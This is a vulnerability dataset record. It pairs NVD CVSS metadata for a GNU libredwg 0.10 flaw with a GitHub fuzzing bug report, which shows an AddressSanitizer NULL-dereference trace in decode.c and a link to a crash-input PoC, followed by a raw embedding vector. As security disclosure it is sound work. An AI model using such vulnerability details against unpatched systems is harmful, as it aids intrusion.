{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Not Applicable" ], "url": "http://gnu.com" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/188#issuecomment-574493437" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.10:*:*:*:*:*:*:*", "matchCriteriaId": "C3E7D34E-1D80-4CF0-8110-412C6D8514EF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/188#issuecomment-574493437
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: ./dwgbmp $PoC **1.NULL pointer dereference in read_2004_compressed_section ../../src/decode.c:2417** POC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG_4c26d37/id:000012%2Csig:06%2Csrc:002489%2Cop:havoc%2Crep:16 ``` ================================================================= ==20486==ERROR: AddressSanitizer: SEGV on unknown address 0x62904165558b (pc 0x7fa1bce115c5 bp 0x7fff8e06b350 sp 0x7fff8e06aab8 T0) ==20486==The signal is caused by a READ memory access. #0 0x7fa1bce115c4 (/lib/x86_64-linux-gnu/libc.so.6+0xbb5c4) #1 0x7fa1bd55e6ce (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x796ce) #2 0x5634364fc7b6 in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34 #3 0x5634364fc7b6 in read_2004_compressed_section ../../src/decode.c:2417 #4 0x563436ac5dd2 in read_2004_section_summary ../../src/decode.c:2785 #5 0x563436ac5dd2 in decode_R2004 ../../src/decode.c:3352 #6 0x563436ad208d in dwg_decode ../../src/decode.c:246 #7 0x563436464fae in dwg_read_file ../../src/dwg.c:211 #8 0x5634364639d0 in get_bmp ../../programs/dwgbmp.c:111 #9 0x563436463066 in main ../../programs/dwgbmp.c:280 #10 0x7fa1bcd77b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #11 0x5634364636c9 in _start (/home/user/linhlhq/libredwg/asan_build/programs/dwgbmp+0x28f6c9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0xbb5c4) ```
Several bugs found by fuzzing
https://api.github.com/repos/LibreDWG/libredwg/issues/188/comments
15
2020-01-15T04:37:59
2020-01-16T23:22:04Z
https://github.com/LibreDWG/libredwg/issues/188
549,961,224
188
true
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : Several bugs found by fuzzing Issue date: --- start body --- Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: ./dwgbmp $PoC **1.NULL pointer dereference in read_2004_compressed_section ../../src/decode.c:2417** POC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG_4c26d37/id:000012%2Csig:06%2Csrc:002489%2Cop:havoc%2Crep:16 ``` ================================================================= ==20486==ERROR: AddressSanitizer: SEGV on unknown address 0x62904165558b (pc 0x7fa1bce115c5 bp 0x7fff8e06b350 sp 0x7fff8e06aab8 T0) ==20486==The signal is caused by a READ memory access. #0 0x7fa1bce115c4 (/lib/x86_64-linux-gnu/libc.so.6+0xbb5c4) #1 0x7fa1bd55e6ce (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x796ce) #2 0x5634364fc7b6 in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34 #3 0x5634364fc7b6 in read_2004_compressed_section ../../src/decode.c:2417 #4 0x563436ac5dd2 in read_2004_section_summary ../../src/decode.c:2785 #5 0x563436ac5dd2 in decode_R2004 ../../src/decode.c:3352 #6 0x563436ad208d in dwg_decode ../../src/decode.c:246 #7 0x563436464fae in dwg_read_file ../../src/dwg.c:211 #8 0x5634364639d0 in get_bmp ../../programs/dwgbmp.c:111 #9 0x563436463066 in main ../../programs/dwgbmp.c:280 #10 0x7fa1bcd77b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #11 0x5634364636c9 in _start (/home/user/linhlhq/libredwg/asan_build/programs/dwgbmp+0x28f6c9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0xbb5c4) ``` --- end body ---
1,738
[ -0.017338374629616737, 0.021850494667887688, -0.004611977841705084, 0.015356000512838364, 0.05118666961789131, 0.054204609245061874, -0.017545487731695175, 0.04488449543714523, -0.01917281001806259, 0.027694057673215866, -0.012086562812328339, 0.0011705621145665646, 0.012108753435313702, 0.012293676845729351, -0.011095375753939152, 0.014372210018336773, -0.0032638898119330406, 0.007759366184473038, -0.023418640717864037, -0.027442563325166702, 0.027768027037382126, -0.005543989595025778, -0.017308786511421204, 0.020607812330126762, -0.025356631726026535, 0.004382673650979996, -0.006113552022725344, -0.007604030892252922, -0.017974508926272392, 0.01736796274781227, 0.013810045085847378, 0.022427452728152275, 0.017752600833773613, 0.0009153684950433671, 0.03772427886724472, -0.01055540144443512, 0.043996863067150116, 0.060299668461084366, 0.013381022959947586, 0.03446963429450989, 0.00561795849353075, -0.07390999794006348, -0.02142147161066532, 0.014364813454449177, -0.011857258155941963, -0.009031635709106922, 0.029025504365563393, 0.016140073537826538, -0.013432801701128483, -0.0018889877246692777, -0.011376459151506424, -0.017338374629616737, -0.035268500447273254, -0.07361412048339844, 0.04251747950911522, -0.017338374629616737, 0.033522829413414, 0.02171734906733036, 0.004711836110800505, -0.006339157931506634, -0.018285179510712624, 0.03074158914387226, -0.0032971759792417288, 0.027753233909606934, 0.0068976255133748055, 0.020800132304430008, -0.040150467306375504, 0.007552252616733313, -0.027560913935303688, -0.005614260211586952, 0.004360482562333345, -0.04485490545630455, -0.004512119572609663, 0.027309419587254524, 0.021746937185525894, -0.00689392676576972, 0.011857258155941963, 0.011901640333235264, -0.016850177198648453, 0.02261977270245552, -0.013144321739673615, 0.04257665574550629, -0.035416439175605774, 0.01766383834183216, 0.0075707449577748775, 0.006157933734357357, -0.02186528779566288, -0.08391062915325165, -0.006157933734357357, -0.04577212408185005, -0.004615676589310169, 0.03080076351761818, 0.024690909311175346, -0.008713568560779095, 0.017234817147254944, -0.011021406389772892, -0.040002528578042984, -0.01736796274781227, -0.04810955002903938, -0.011265505105257034, -0.03846396878361702, -0.005802881438285112, -0.011250711046159267, 0.011576175689697266, 0.03198426961898804, 0.01832956075668335, 0.0031954683363437653, -0.016495125368237495, 0.006072869058698416, 0.1129065454006195, 0.0014682881301268935, -0.008617408573627472, -0.03846396878361702, -0.006383539643138647, -0.0068569425493478775, 0.009638182818889618, 0.03728046268224716, -0.007951686158776283, -0.057666368782520294, -0.024321064352989197, 0.0011418991489335895, -0.032191384583711624, -0.028433749452233315, 0.004145971965044737, -0.04813913628458977, 0.03621530532836914, 0.00666832085698843, -0.017264405265450478, -0.022871268913149834, -0.013284863904118538, -0.02448379620909691, -0.036629535257816315, 0.017856158316135406, -0.020563429221510887, 0.010237333364784718, 0.00422733835875988, -0.030075864866375923, 0.03088952600955963, 0.016184454783797264, 0.0054811155423521996, -0.05716337636113167, -0.04142273589968681, 0.03364117816090584, -0.010769912041723728, -0.029646843671798706, 0.00048496038652956486, -0.0423695407807827, 0.011147154495120049, 0.0020877798087894917, -0.010925247333943844, -0.01772301457822323, -0.024616939947009087, 0.010148570872843266, 0.031688392162323, 0.04251747950911522, -0.020001264289021492, 0.02022317238152027, 0.04532830789685249, 0.008846713230013847, -0.026406994089484215, 0.01856626197695732, -0.030771175399422646, 0.0256968904286623, -0.03600819408893585, -0.02562292106449604, -0.0004241669666953385, 0.01750110648572445, 0.022442247718572617, -0.005850961431860924, 0.02523828111588955, 0.000757259433157742, -0.01631760038435459, 0.027324212715029716, 0.018004097044467926, -0.058879461139440536, 0.002655493328347802, -0.01156877912580967, 0.021007245406508446, -0.014098524115979671, -0.012937208637595177, 0.0034414157271385193, 0.0073710279539227486, 0.018876932561397552, -0.0011298791505396366, 0.016776207834482193, 0.004619374871253967, 0.031007876619696617, -0.00546632194891572, -0.0069420067593455315, -0.03473592549562454, 0.00411638431251049, -0.00928313098847866, 0.004271719604730606, -0.023107970133423805, 0.040919747203588486, -0.019350335001945496, -0.04012088105082512, -0.016036516055464745, 0.010148570872843266, -0.011502206325531006, 0.007796350866556168, 0.01138385571539402, -0.020090026780962944, 0.014897391200065613, -0.00647969963029027, 0.002211678307503462, -0.014889994636178017, 0.04680769145488739, -0.0015792418271303177, -0.03177715837955475, -0.013144321739673615, -0.03420334681868553, 0.017708219587802887, -0.005174143705517054, -0.02577085979282856, 0.0030863636638969183, -0.01563708297908306, 0.029632050544023514, -0.035120561718940735, 0.0007517117192037404, 0.02735380083322525, -0.021451059728860855, 0.007149120792746544, 0.0030049977358430624, -0.07834814488887787, -0.010806895792484283, 0.007751969154924154, 0.010207746177911758, -0.04532830789685249, 0.004874568432569504, 0.03583066910505295, -0.02998710237443447, -0.008144006133079529, 0.018433118239045143, -0.02571168541908264, -0.010459241457283497, -0.002698025666177273, 0.01397277694195509, -0.03020901046693325, 0.01742713712155819, 0.022708537057042122, 0.025149518623948097, -0.017190435901284218, -0.01772301457822323, 0.010910453274846077, 0.04651181772351265, -0.009416275657713413, -0.00437897490337491, -0.029099471867084503, 0.02766447141766548, 0.009971044957637787, -0.030445711687207222, 0.007581840269267559, 0.022575391456484795, 0.013669502921402454, -0.011058391071856022, 0.027989935129880905, 0.018462706357240677, -0.014364813454449177, -0.037014175206422806, 0.03784262761473656, 0.0013323697494342923, -0.012167928740382195, -0.0009560515754856169, 0.007315551396459341, -0.016554301604628563, -0.030712001025676727, 0.02134750410914421, -0.018359148874878883, -0.02908467873930931, 0.04621594026684761, -0.014165096916258335, -0.00237625977024436, -0.00715651735663414, -0.025045961141586304, 0.008180990815162659, 0.04124521091580391, 0.002527896547690034, -0.00464156549423933, 0.00162917107809335, -0.0014812326990067959, 0.027324212715029716, -0.01932074874639511, 0.010755117982625961, -0.009401481598615646, -0.01834435574710369, -0.009305321611464024, -0.028833184391260147, -0.03222097083926201, -0.009482848457992077, -0.0005954518564976752, 0.00848426390439272, -0.05364244431257248, -0.0035338771995157003, -0.012633934617042542, 0.038730259984731674, 0.013551152311265469, -0.012596949934959412, -0.055950284004211426, -0.0004463577351998538, -0.021924462169408798, -0.011968212202191353, -0.021539824083447456, -0.018817758187651634, -0.02111080288887024, -0.002457625698298216, -0.017708219587802887, 0.02057822421193123, -0.017382755875587463, -0.007604030892252922, 0.020252760499715805, -0.04855336621403694, -0.008965063840150833, -0.02960246242582798, -0.0256968904286623, -0.007260074373334646, 0.015814609825611115, -0.04689645394682884, -0.011228520423173904, 0.0025149518623948097, -0.04367139935493469, -0.004881965462118387, -0.03299025073647499, 0.00602848781272769, 0.039410773664712906, -0.03878943622112274, 0.005780690815299749, 0.04964810982346535, -0.05408626049757004, 0.024099156260490417, 0.014601514674723148, -0.018092859536409378, -0.004567596595734358, -0.015489145182073116, -0.0033489542547613382, -0.04870130494236946, -0.051127493381500244, 0.0236701350659132, 0.016554301604628563, -0.0035616157110780478, -0.01198300626128912, 0.025756066665053368, 0.0020156600512564182, -0.006198616698384285, 0.007936892099678516, -0.029661638662219048, 0.009024239145219326, -0.020933276042342186, 0.019557449966669083, -0.01093264389783144, 0.0010152269387617707, 0.04947058483958244, -0.02059301733970642, 0.03793139383196831, -0.0008437109063379467, -0.02824142947793007, 0.0029106868896633387, -0.047310683876276016, 0.012530378066003323, -0.0033230651170015335, 0.002805280964821577, -0.013314451090991497, 0.00043480005115270615, 0.0029846560209989548, 0.011176741681993008, 0.011864655651152134, 0.008469470776617527, 0.005595767870545387, -0.003239849815145135, -0.0011862806277349591, -0.03446963429450989, 0.05574316903948784, -0.03799056634306908, -0.029173441231250763, -0.018655026331543922, -0.02628864347934723, 0.02501637488603592, 0.023418640717864037, -0.03358200564980507, 0.004390070214867592, -0.04231036826968193, -0.00984529685229063, -0.002712819492444396, -0.03621530532836914, 0.02960246242582798, 0.03435128554701805, -0.022368278354406357, 0.03870067000389099, -0.02322632074356079, -0.02877400815486908, -0.008388103917241096, 0.06515204906463623, -0.007045563776046038, -0.04630470275878906, 0.011657541617751122, 0.041274797171354294, -0.010274318046867847, -0.00486717140302062, 0.0092091616243124, -0.034380871802568436, -0.019409511238336563, 0.011886846274137497, -0.01449795812368393, -0.009689961560070515, 0.02043028548359871, 0.03503179922699928, 0.009697359055280685, -0.014394400641322136, 0.018447911366820335, 0.01393579225987196, 0.0037317448295652866, -0.01864023134112358, -0.002810828620567918, 0.005577275529503822, 0.052784401923418045, 0.014963964000344276, -0.0076114279218018055, 0.0144609734416008, -0.014682880602777004, -0.010045013390481472, 0.002620358020067215, -0.012264088727533817, 0.012818858027458191, 0.011487412266433239, 0.007581840269267559, 0.023684930056333542, -0.01273749116808176, 0.01690935343503952, 0.01668744534254074, -0.0359194315969944, -0.0032916280906647444, 0.02435065247118473, 0.0069198161363601685, 0.03328612819314003, -0.022294308990240097, -0.04358263686299324, -0.01856626197695732, -0.025977972894906998, -0.008802331984043121, 0.007396917324513197, 0.0019416908035054803, 0.04485490545630455, -0.024084363132715225, -0.004896759055554867, -0.011931227520108223, -0.02969122678041458, -0.046541403979063034, 0.003853793954476714, 0.0158441960811615, -0.03944036364555359, 0.0012731944443657994, 0.03006107173860073, -0.03627448156476021, 0.0020286045037209988, 0.0033360098022967577, -0.018610643222928047, -0.0521334744989872, 0.0034765510354191065, 0.028788801282644272, 0.008595217950642109, -0.011731510981917381, 0.019557449966669083, -0.02418791875243187, -0.004778408445417881, 0.02066698670387268, 0.037546753883361816, 0.04633428901433945, -0.039558712393045425, 0.0017336525488644838, -0.005673435516655445, -0.013713885098695755, 0.01818162202835083, 0.01772301457822323, -0.008277150802314281, 0.0017170094652101398, 0.02028234675526619, -0.02473529241979122, 0.004027621354907751, -0.010252127423882484, -0.012071768753230572, 0.004371578339487314, -0.0408901572227478, -0.004955934826284647, -0.028211843222379684, 0.02682122215628624, -0.020800132304430008, 0.052547700703144073, 0.01532641239464283, 0.023536991328001022, 0.04186655208468437, -0.003130745142698288, 0.016169661656022072, -0.02741297520697117, -0.04952975735068321, 0.0022597583010792732, 0.03020901046693325, -0.01341061107814312, -0.034913450479507446, 0.04041675478219986, 0.020075233653187752, 0.028803596273064613, -0.0008474093629047275, 0.026421789079904556, 0.00017764158837962896, 0.03411458432674408, -0.016554301604628563, -0.028966328129172325, 0.0018131693359464407, -0.0013619574019685388, -0.035593967884778976, 0.010548003949224949, -0.023862455040216446, 0.0026684380136430264, -0.057133790105581284, -0.0076114279218018055, -0.01668744534254074, 0.0021820906549692154, 0.00823276862502098, 0.010052410885691643, 0.010059807449579239, -0.016554301604628563, -0.03109664097428322, -0.0049670301377773285, 0.04680769145488739, 0.015311619266867638, 0.014165096916258335, -0.0035597665701061487, -0.0073710279539227486, 0.022471833974123, -0.014142906293272972, -0.0033822404220700264, -0.003208412788808346, -0.012145738117396832, 0.03733963891863823, -0.009053826332092285, 0.01606610417366028, -0.011553985066711903, 0.029883546754717827, 0.007149120792746544, -0.015814609825611115, -0.019024871289730072, 0.024912817403674126, -0.03689582273364067, 0.00048496038652956486, -0.015141489915549755, 0.017323579639196396, -0.020090026780962944, 0.035061389207839966, 0.0020286045037209988, -0.01224929466843605, -0.004404864273965359, -0.006760782562196255, -0.0026480962987989187, 0.00041006659739650786, -0.0061468384228646755, 0.009971044957637787, -0.00490415608510375, -0.00046207619016058743, 0.02915864810347557, 0.00572891253978014, 0.021007245406508446, -0.0006472302484326065, 0.0236701350659132, -0.00446773786097765, 0.012826254591345787, 0.004268021322786808, -0.017530694603919983, 0.029025504365563393, -0.03763551637530327, -0.030919114127755165, 0.033611591905355453, 0.021746937185525894, 0.017308786511421204, -0.021140389144420624, -0.02245704084634781, 0.0054996078833937645, -0.025045961141586304, -0.005529195535928011, -0.0012140190228819847, -0.03171798214316368, 0.013469786383211613, -0.047073982656002045, -0.011073185130953789, 0.01667265221476555, 0.014061539433896542, -0.025075549259781837, 0.007914701476693153, -0.017471518367528915, 0.0340849943459034, -0.011280299164354801, 0.006054376717656851, -0.009408879093825817, -0.0016791002126410604, -0.002938425401225686, 0.030682412907481194, 0.005710420198738575, 0.0006453810492530465, 0.013565946370363235, -0.009238749742507935, 0.0031936189625412226, -0.013233085162937641, 0.015755433589220047, 0.01757507584989071, -0.020045645534992218, -0.03367076814174652, -0.001142823719419539, 0.012167928740382195, -0.005817675497382879, -0.024291476234793663, 0.0170424971729517, 0.0342625193297863, 0.0016994416946545243, 0.07083287835121155, -0.002786788623780012, 0.020859306678175926, -0.00029980629915371537, 0.0013434650609269738, 0.010695942677557468, -0.024099156260490417, 0.010414859279990196, 0.016657857224345207, -0.042339954525232315, 0.013639915734529495, 0.020045645534992218, 0.015163680538535118, 0.03222097083926201, 0.007200899068266153, -0.024010393768548965, -0.0110066132619977, -0.00565494317561388, -0.026939572766423225, 0.01886213943362236, 0.012034784071147442, -0.022338690236210823, -0.020918482914566994, 0.03547561541199684, 0.046778105199337006, 0.008107021450996399, -0.014468370005488396, 0.014120714738965034, 0.011243314482271671, 0.00012516971037257463, -0.00949764158576727, 0.013321847654879093, -0.027560913935303688, -0.005288796033710241, 0.0007410786347463727, 0.01818162202835083, 0.021214358508586884, 0.034972626715898514, -0.02621467411518097, -0.014105921611189842, 0.0008460223907604814, 0.019276365637779236, 0.019113633781671524, -0.01554832048714161, 0.02600756101310253, 0.03864149749279022, -0.0034876465797424316, 0.0073266467079520226, 0.007452394347637892, -0.014379607513546944, -0.03503179922699928, 0.0010919698979705572, -0.011613160371780396, 0.0015847894828766584, -0.039558712393045425, -0.001112311496399343, 0.020607812330126762, 0.019113633781671524, -0.0019398415461182594, -0.02125873975455761, 0.006686813198029995, -0.0011909037129953504, -0.011576175689697266, -0.0028626068960875273, 0.003740991000086069, 0.0150601239874959, -0.030534474179148674, 0.005673435516655445, -0.004915251396596432, -0.0029143854044377804, -0.0005053019267506897, 0.004108987748622894, -0.030194217339158058, 0.010666354559361935, -0.007766763214021921, -0.01055540144443512, -0.022072400897741318, -0.03210262209177017, 0.020844513550400734, 0.00059406494256109, 0.01764904521405697, 0.004493627231568098, 0.026318231597542763, -0.0179597157984972, 0.041511498391628265, -0.02254580333828926, -0.024971993640065193, 0.004441848956048489, -0.023048793897032738, -0.000525181123521179, 0.008809728547930717, -0.008565629832446575, 0.012907620519399643, 0.01033349335193634, -0.00792209804058075, -0.010584988631308079, 0.03275354951620102, 0.005285097286105156, -0.02396601252257824, -0.0005399749497883022, -0.03846396878361702, -0.018743788823485374, 0.0049670301377773285, -0.016258424147963524, 0.013595533557236195, 0.0025020071770995855, -0.003186222165822983, 0.009490245021879673, -0.012574759311974049, -0.014512752182781696, -0.00009153685095952824, -0.043405111879110336, 0.00890588853508234, -0.013240481726825237, 0.006058075465261936, -0.008536042645573616, -0.010880865156650543, 0.009482848457992077, 0.009098208509385586, -0.019069252535700798, 0.005684530828148127, 0.014157699421048164, -0.02788637764751911, 0.00490415608510375, 0.008817125111818314, -0.01983853243291378, 0.014853009954094887, 0.004105289001017809, 0.00352093274705112, -0.00019324447202961892, 0.006313269026577473, -0.02043028548359871, -0.008883697912096977, -0.0050077131018042564, 0.010548003949224949, 0.015888579189777374, -0.018373942002654076, 0.027457356452941895, 0.007796350866556168, 0.008550836704671383, 0.023551784455776215, -0.04041675478219986, -0.010178158059716225, -0.01563708297908306, 0.03198426961898804, -0.03192509338259697, -0.0072304867208004, -0.013173909857869148, -0.029040297493338585, 0.010755117982625961, -0.010954834520816803, 0.03290148824453354, 0.03213220834732056, -0.0002679071039892733, 0.016332393512129784, -0.030386535450816154, 0.015947753563523293, 0.008358516730368137, 0.03322695195674896, -0.00834372267127037, -0.00031598706846125424, -0.004671153146773577, 0.01945389248430729, -0.021983638405799866, 0.009334909729659557, 0.005244414322078228, 0.025741271674633026, 0.025785652920603752, -0.016110485419631004, -0.0144609734416008, -0.02961725741624832, 0.02330029010772705, 0.01179808285087347, -0.0074080126360058784, 0.03367076814174652, -0.0144609734416008, -0.0005658641457557678, -0.0018584755016490817, -0.006069170776754618, -0.024824054911732674, 0.03976582735776901, -0.015252443961799145, -0.00894287321716547, -0.03349324315786362, 0.023019205778837204, 0.025904003530740738, -0.0010337191633880138, -0.022708537057042122, 0.030475299805402756, -0.00647969963029027, -0.03364117816090584, -0.024602146819233894, -0.006997483782470226, -0.02398080565035343, -0.044943667948246, 0.035061389207839966, -0.02472049742937088, 0.02600756101310253, -0.005950820166617632, -0.009364496916532516, 0.018965696915984154, 0.03769468888640404, -0.004268021322786808, 0.0025334442034363747, 0.001910253893584013, -0.018063271418213844, 0.0013027820969000459, 0.0034395665861666203, -0.030090659856796265, 0.0015866387402638793, -0.008010861463844776, -0.060003794729709625, -0.007722381502389908, -0.03674788400530815, -0.0009958100272342563, 0.011864655651152134, 0.033996231853961945, 0.0054552266374230385, 0.0019453892018646002, -0.0024095457047224045, -0.0170424971729517, 0.0021617491729557514, 0.007444997318089008, 0.026170292869210243, 0.023241113871335983, -0.011169345118105412, -0.002320782747119665, 0.04665975272655487, -0.025667302310466766, -0.005732610821723938, -0.015045329928398132, -0.010244730859994888, -0.021998431533575058, -0.02591879852116108, -0.02473529241979122, 0.005107571370899677, 0.011687129735946655, 0.0073451390489935875, 0.043553050607442856, 0.02893674001097679, -0.012944605201482773, -0.006908720824867487, -0.009941456839442253, 0.012759682722389698, 0.008129212073981762, -0.003744689282029867, -0.0005482964916154742, -0.011124963872134686, 0.032723963260650635, -0.005780690815299749, -0.006065472029149532, -0.006109853740781546, 0.0027442562859505415, 0.015518732368946075, -0.015740640461444855, -0.03254643455147743, 0.0009625238599255681, -0.014024555683135986, -0.0359194315969944, -0.024025186896324158, 0.016924146562814713, 0.00901684258133173, -0.02352219633758068, -0.032871901988983154, -0.011265505105257034, -0.0138618228957057, 0.023625753819942474, 0.030534474179148674, -0.012234501540660858, -0.004930045455694199, -0.0009874884271994233, 0.03216179832816124, 0.013292260468006134, -0.07882154732942581, 0.012241898104548454, -0.019720181822776794, -0.011443031020462513, -0.01794492080807686, 0.004623073153197765, 0.028004728257656097, -0.05035821348428726, -0.03192509338259697, 0.03266478702425957, 0.03878943622112274, -0.0028533609583973885, -0.018965696915984154, -0.029188236221671104, -0.007374726701527834, -0.013920998200774193, -0.0030660221818834543, 0.03473592549562454, -0.025341838598251343, 0.003853793954476714, -0.018536673858761787, 0.03142210468649864, -0.0003501978062558919, 0.007396917324513197, 0.025282664224505424, 0.020045645534992218, -0.005577275529503822, 0.0001504810352344066, -0.03837520629167557, -0.021968845278024673, -0.003016093047335744, -0.041659437119960785, -0.0011474468046799302, 0.021081214770674706, 0.06438276916742325, 0.012308469973504543, -0.009800915606319904, -0.03248726204037666, 0.012116150930523872, -0.007400615606456995, -0.030919114127755165, -0.03479509800672531, 0.011176741681993008, -0.0005432111211121082, 0.002936576260253787, 0.004182956647127867, -0.008728362619876862, 0.013129528611898422, 0.01205697562545538, 0.029498906806111336, 0.008499057963490486, 0.006350253708660603, 0.004430753644555807, -0.00886890385299921, -0.03967706486582756, -0.0170424971729517, 0.015725845471024513, 0.028759215027093887, -0.018373942002654076, 0.0006490795058198273, 0.002698025666177273, 0.0025574842002242804, -0.01389880757778883, -0.012493393383920193, -0.011561381630599499, -0.014054142870008945, -0.017545487731695175, -0.003544972511008382, -0.01239723339676857, -0.011065788567066193, 0.01908404752612114, -0.019956883043050766, -0.011376459151506424, -0.0026480962987989187, 0.025001579895615578, 0.0044825319200754166, 0.02352219633758068, -0.020548636093735695, -0.01954265497624874, 0.006083964370191097, 0.03248726204037666, -0.04435191676020622, -0.013580740429461002, -0.022649360820651054, -0.020311934873461723, -0.013847028836607933, 0.007729778531938791, 0.03553479164838791, 0.01952786184847355, -0.015385587699711323, 0.024705704301595688, -0.017974508926272392, -0.013025971129536629, -0.012937208637595177, 0.013617725111544132, -0.019927294924855232, 0.012204913422465324, 0.018684612587094307, -0.015267237089574337, -0.01138385571539402, -0.005100174341350794, 0.016864972189068794, 0.02801952324807644, -0.002657342469319701, -0.0199864711612463, -0.006206013727933168, -0.0018778924131765962, 0.03133334219455719, -0.030564062297344208, 0.005614260211586952, -0.0007886962848715484, 0.0011049144668504596, -0.02591879852116108, -0.011857258155941963, 0.009630786255002022, -0.021391885355114937, -0.010148570872843266, 0.02553415857255459, -0.020163996145129204, -0.029262205585837364, 0.007248979061841965, -0.011258108541369438, 0.01960183121263981, 0.0005635526613332331, -0.006054376717656851, -0.004086796659976244, 0.0009287754073739052, 0.03825685754418373, -0.03004627861082554, 0.01735316775739193, -0.018965696915984154, -0.026540139690041542, 0.0066313361749053, 0.0037779754493385553, 0.03059365041553974, -0.0268951915204525, 0.0019953183364123106, -0.009837900288403034, -0.0054145436733961105, 0.010274318046867847, 0.011472619138658047, -0.005884247832000256, -0.019557449966669083, 0.025608127936720848, -0.0018325862474739552, -0.007774160243570805, 0.01089565921574831, 0.0027091209776699543, 0.007008579093962908, -0.017323579639196396, 0.0008548062760382891, 0.01825559139251709, -0.01529682520776987, -0.02148064784705639, 0.01198300626128912, 0.04911553114652634, -0.0029513700865209103, -0.02969122678041458, 0.0038648892659693956, -0.009179574437439442, 0.012611743994057178, -0.001518217264674604, -0.004737725481390953, 0.018655026331543922, -0.035061389207839966, 0.021835699677467346, 0.010340890847146511, 0.042635831981897354, -0.02057822421193123, -0.009149986319243908, 0.0036207910161465406, 0.00007957465277286246, -0.019439099356532097, 0.011132360436022282, -0.00666832085698843, -0.018595850095152855, -0.024912817403674126, 0.00693091144785285, -0.028078697621822357, -0.028433749452233315, -0.014105921611189842, -0.0025778256822377443, 0.010688545182347298, -0.004915251396596432, -0.005928629077970982, -0.006890228483825922, 0.03328612819314003, -0.025356631726026535, -0.0035671633668243885, 0.04056469351053238, -0.025741271674633026, 0.011324680410325527, 0.0006439941353164613, -0.02140667848289013, -0.03299025073647499, -0.01689455844461918, -0.005063190124928951, -0.006461207289248705, 0.02020837739109993, -0.030682412907481194, 0.01044444739818573, 0.016421156004071236, -0.0020655891858041286, 0.011886846274137497, 0.006265189033001661, -0.02065219357609749, -0.009364496916532516, 0.012981589883565903, -0.018152035772800446, -0.01818162202835083, -0.011886846274137497, 0.006379841361194849, 0.10160405933856964, -0.015977341681718826, 0.003103006863966584, -0.019942089915275574, 0.0031899206805974245, 0.008883697912096977, 0.003779824823141098, 0.015444763004779816, -0.010866071097552776, -0.007541157305240631, 0.02628864347934723, -0.019749769940972328, -0.01901007816195488, 0.007700190879404545, 0.02254580333828926, -0.0009477300336584449, -0.010215142741799355, -0.01901007816195488, 0.033996231853961945, -0.009586405009031296, 0.025977972894906998, -0.005373860243707895, 0.014853009954094887, -0.020326728001236916, 0.02523828111588955, -0.0017336525488644838, -0.03488386049866676, -0.0216433797031641, -0.012744888663291931, -0.01599213480949402, -0.006365047302097082, -0.0012491544475778937, -0.013092543929815292, -0.011502206325531006, 0.00043849850771948695, 0.0011187837226316333, 0.021746937185525894, 0.008476867340505123, -0.033700354397296906, -0.0040128277614712715, 0.003543123370036483, -0.003975843079388142, -0.019956883043050766, -0.011139757931232452, 0.025060756132006645, -0.012197516858577728, 0.04813913628458977, 0.0024076965637505054, -0.018728993833065033, -0.01239723339676857, 0.0023522197734564543, -0.01337362639605999, 0.03659994527697563, 0.02208719588816166, 0.018595850095152855, 0.02901070937514305, 0.01201999094337225, -0.005177841987460852, -0.008299341425299644, -0.022708537057042122, -0.010806895792484283, 0.012567362748086452, -0.007337742019444704, -0.0016347187338396907, 0.02704313024878502, -0.01683538407087326, -0.03864149749279022, -0.003935160115361214, -0.02133270911872387, 0.03050488792359829, 0.006812560837715864, 0.01138385571539402, -0.00424213195219636, -0.0112359169870615, 0.023093175143003464, 0.0071010407991707325, 0.015429969877004623, 0.028433749452233315, -0.014623705297708511, -0.018063271418213844, 0.02179131843149662, 0.029853958636522293, 0.00450472254306078, 0.028877565637230873, -0.014165096916258335, 0.028907153755426407, -0.00883191917091608, -0.007282264996320009, -0.0026314533315598965, 0.0018427569884806871, 0.005529195535928011, 0.002866305410861969, 0.02103683352470398, -0.0015015741810202599, 0.005299891345202923, 0.02532704547047615, 0.021835699677467346, -0.006568462587893009, -0.01228627935051918, -0.01571105234324932, 0.004526913166046143, -0.017530694603919983, 0.023773692548274994, 